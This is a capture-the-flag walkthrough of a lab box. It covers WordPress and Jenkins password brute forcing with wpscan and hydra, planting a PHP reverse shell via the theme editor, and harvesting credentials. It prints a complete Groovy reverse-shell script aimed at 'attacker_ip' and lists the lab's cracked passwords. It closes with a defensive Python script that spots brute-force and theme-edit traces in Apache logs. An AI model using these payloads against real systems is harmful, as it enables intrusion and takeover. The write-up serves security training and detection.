Internal
Tasks:
- Pre-engagement Briefing:
- Understand that this is a fully black-box pentest and that access has to be proven by retrieving `user.txt` and `root.txt`.
- Deploy and Engage the Client Environment:
- An nmap scan with `nmap -sC -sV -T5 10.10.8.96` reveals ports 22 and 80 open. Port 80 is served by Apache/2.4.29.
- Use gobuster to find directories accessible to us: `gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://10.10.8.96/" --threads=100`. `/blog` and `/phpmyadmin` look interesting; `/blog` is a WordPress site.
- By reading the post there, we can confirm that there is a user called admin.
- Now use wpscan to brute-force the admin credentials: `wpscan --url http://internal.thm/blog/ -U admin -P /usr/share/wordlists/rockyou.txt -t 100` gives `[admin:my2boys]`. Log in as the WordPress administrator with these credentials.
- Twenty Seventeen is the active theme. Go to the theme editor and replace the contents of the `404.php` template with the Pentest Monkey PHP reverse shell after setting the required IP and PORT values. Start a netcat listener in another terminal with `nc -nlvp 1234`, then open the 404 page to get a shell. (The theme location can also be obtained from the wpscan output.)
- Run `python -c 'import pty; pty.spawn("/bin/bash")'` to get an interactive shell.
- Navigating to `/home` and running `ls` shows a user called aubreanna, but we cannot access that directory because of its permissions.
- `find / -type f -name "*.txt" | less` turns up an interesting file, `/opt/wp-save.txt`; `cat /opt/wp-save.txt` gives aubreanna's credentials, `[aubreanna:bubb13guM!@#123]`. Switch to that user with `su aubreanna` and the password `bubb13guM!@#123`.
- `cat /home/aubreanna/user.txt` and submit the user flag. There is also a `jenkins.txt` in the same directory; `cat /home/aubreanna/jenkins.txt` reveals an internal Jenkins service running at 172.17.0.2:8080.
- Use an SSH local port forward to expose the Jenkins port on our own machine: `ssh -L 8080:172.17.0.2:8080 aubreanna@internal.thm`.
- Open http://127.0.0.1:8080 in a browser: it is a Jenkins login page. After intercepting a login request in Burp to learn the form fields, use hydra to brute-force the password, keeping the default user admin: `hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8080 http-post-form '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password'` gives `[admin:spongebob]`.
- Start a netcat listener with `nc -nlvp 1337`.
- Once logged in to the Jenkins instance with the above credentials, go to Manage Jenkins > Script Console, paste the script below and run it to get a reverse shell.
```groovy
String host = "attacker_ip";
int port = 1337;
String cmd = "bash";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();
```
- `ls -la` reveals `.dockerfile`, which suggests we are inside a Docker container.
- Using `find / -name "*.txt" | more` we find the file `/opt/note.txt`; `cat /opt/note.txt` reveals root credentials for the host OS running this container: `[root:tr0ub13guM!@#123]`.
- Log in over SSH with `ssh root@internal.thm` and `tr0ub13guM!@#123` as the password.
- `cat /root/root.txt` and submit the root flag.
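The wpscan and hydra steps above are plain password guessing against a login form, and the theme-editor step saves a PHP file through the WordPress dashboard; both leave an obvious trail in the web server's access log. The following Python is an added example, not code from the original write-up or from the room, that scans Apache combined-format log lines for exactly that trail: an IP that POSTs to a login endpoint many times inside a short window, and any POST to the theme editor. The sample log lines, IPs, timestamps and thresholds are constructed for the example, and listing the Jenkins login path assumes Jenkins sits behind a proxy that writes the same log format (on this box it was only reachable through the SSH tunnel, so Apache would not see those requests).

```python
"""Detect the access-log footprint of login brute-forcing and theme-editor file saves.

Added example; the log lines and thresholds below are constructed, not taken
from the original write-up.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" log format:
#   ip ident user [timestamp] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Login endpoints from the write-up. The Jenkins path only shows up in an Apache
# log if Jenkins is fronted by a proxy writing this format (assumption).
LOGIN_PATHS = {"/blog/wp-login.php", "/j_acegi_security_check"}
# Saving a theme file from the WordPress dashboard is a POST to this path.
THEME_EDITOR = "/blog/wp-admin/theme-editor.php"


def parse_line(line):
    """Return ip, ts, method, path (query string stripped) and status; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],
        "status": int(m["status"]),
    }


def brute_force_sources(lines, threshold=20, window=timedelta(minutes=5)):
    """Map each IP that POSTed to a login endpoint at least `threshold` times inside
    some `window` to the largest count seen in one window.

    WordPress answers a failed login with HTTP 200 (the form again), so the count is
    on POST volume rather than on status codes.
    """
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in LOGIN_PATHS:
            posts[rec["ip"]].append(rec["ts"])
    offenders = {}
    for ip, stamps in posts.items():
        stamps.sort()
        best, start = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # slide the window's left edge forward
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            offenders[ip] = best
    return offenders


def theme_file_edits(lines):
    """(ip, iso-timestamp) for every POST to the WordPress theme editor."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == THEME_EDITOR:
            hits.append((rec["ip"], rec["ts"].isoformat()))
    return hits


def _log_line(ip, when, method, path, status):
    """Build one constructed combined-format line."""
    ts = when.strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 5123 "-" "Mozilla/5.0"'


_T0 = datetime(2020, 8, 3, 10, 0, 0, tzinfo=timezone.utc)

# Constructed sample: one IP fires 25 login POSTs in 48 seconds (wpscan-style),
# a second IP logs in normally twice, and the first IP later saves a theme file.
SAMPLE_LOG = (
    [_log_line("10.10.14.5", _T0 + timedelta(seconds=2 * i), "POST", "/blog/wp-login.php", 200)
     for i in range(25)]
    + [_log_line("192.168.1.20", _T0, "POST", "/blog/wp-login.php", 302),
       _log_line("192.168.1.20", _T0 + timedelta(minutes=30), "POST", "/blog/wp-login.php", 302),
       _log_line("192.168.1.20", _T0 + timedelta(minutes=31), "GET", "/blog/", 200),
       _log_line("10.10.14.5", _T0 + timedelta(seconds=60), "POST",
                 "/blog/wp-admin/theme-editor.php?file=404.php&theme=twentyseventeen", 302)]
)

if __name__ == "__main__":
    print("brute-force sources:", brute_force_sources(SAMPLE_LOG))
    print("theme file edits:", theme_file_edits(SAMPLE_LOG))
```

Run it as-is to see the results on the constructed sample, or feed `brute_force_sources` and `theme_file_edits` the lines of a real `access.log`. The theme-editor signal disappears entirely if `DISALLOW_FILE_EDIT` is set in `wp-config.php`, which also removes the foothold used in the theme-editor step above.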